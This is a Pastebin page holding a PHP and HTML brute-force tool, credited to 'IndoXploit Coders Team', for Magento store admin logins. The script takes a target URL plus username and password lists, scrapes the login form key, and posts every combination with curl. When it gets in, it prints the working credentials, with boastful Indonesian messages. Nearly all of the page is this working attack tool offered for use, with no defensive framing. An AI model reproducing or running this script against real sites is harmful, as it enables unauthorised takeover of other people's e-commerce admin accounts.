Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <title>MAGENTO CMS ADMIN BruteForce - IndoXploit Coders Team</title>
- <meta name="author" content="Mr. Error 404 | IndoXploit"/>
- <meta charset="UTF-8"/>
- </head>
- <center>
- <html style="margin: 2em auto; color: #008000; background: #000000;">
- <form method="post">
- URL: <input type="text" name="url" size="35" height="10" style="padding-left: 5px; background: transparent; color: #bb0000; border: 1px #008000 solid;"value="http://www.target-magento.com/admin"><br>
- <textarea placeholder="username" name="user" style="background: transparent; color: #bb0000; border: 1px #008000 solid; padding-left: 5px; margin: 5px auto; width: 400px; height: 250px; resize: none;"></textarea>
- <textarea placeholder="password" name="password" style="background: transparent; color: #bb0000; border: 1px #008000 solid; padding-left: 5px; margin: 5px auto; width: 400px; height: 250px; resize: none;"></textarea><br>
- <input type="submit" name="brute" style="width: 200px; height: 25px; background: transparent; color: #bb0000; border: 1px #008000 solid;">
- </form>
- </html>
- <?php
- $url = $_POST['url'];
- $user = explode("\r\n", $_POST['user']);
- $pass = explode("\r\n", $_POST['password']);
- $go = $_POST['brute'];
- if($go) {
- $ambil = htmlspecialchars(@file_get_contents($url));
- preg_match("/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\">/", $ambil, $key);
- foreach($user as $admin) {
- foreach($pass as $pwd) {
- $data = array(
- "form_key" => $key[1],
- "login[username]" => $admin,
- "dummy" => "",
- "login[password]" => $pwd,
- );
- $c = curl_init();
- curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($c, CURLOPT_URL, $url);
- curl_setopt($c, CURLOPT_POST, 1);
- curl_setopt($c, CURLOPT_POSTFIELDS, $data);
- curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($c, CURLOPT_COOKIEFILE, 'cookie.txt');
- curl_setopt($c, CURLOPT_COOKIESESSION, 1);
- $result = curl_exec($c);
- curl_close($c);
- if(preg_match("/Log Out/", $result)) {
- echo "<div style='margin: 7px auto;'></div>";
- echo "[+] Nyecan di: <b>$url</b><br>";
- echo "[+] <font color=lime>Admin berhasil di Brute!!!</font><br>";
- echo "[+] username: <font color=lime>$admin</font> | password: <font color=lime>$pwd</font><br>";
- echo "[+] Selamat Cokk, anda ganteng sekali!! leeel :v /<br>";
- } else {
- echo "<div style='margin: 7px auto;'></div>";
- echo "[+] Nyecan di: <b>$url</b><br>";
- echo "[!!] username: $admin | password: $pwd<br>";
- echo "[-] <font color=red>Gagal brute admin pake user & pass ini cok !</font><br>";
- }
- }
- }
- echo "<div style='margin: 7px auto;'></div>";
- echo "======================================================<br>";
- echo "Tools ini dibuat oleh: IndoXploit Coders Team. | Copas Script gua berantemin lu jembut !! :3 <br>";
- echo "======================================================<br>";
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement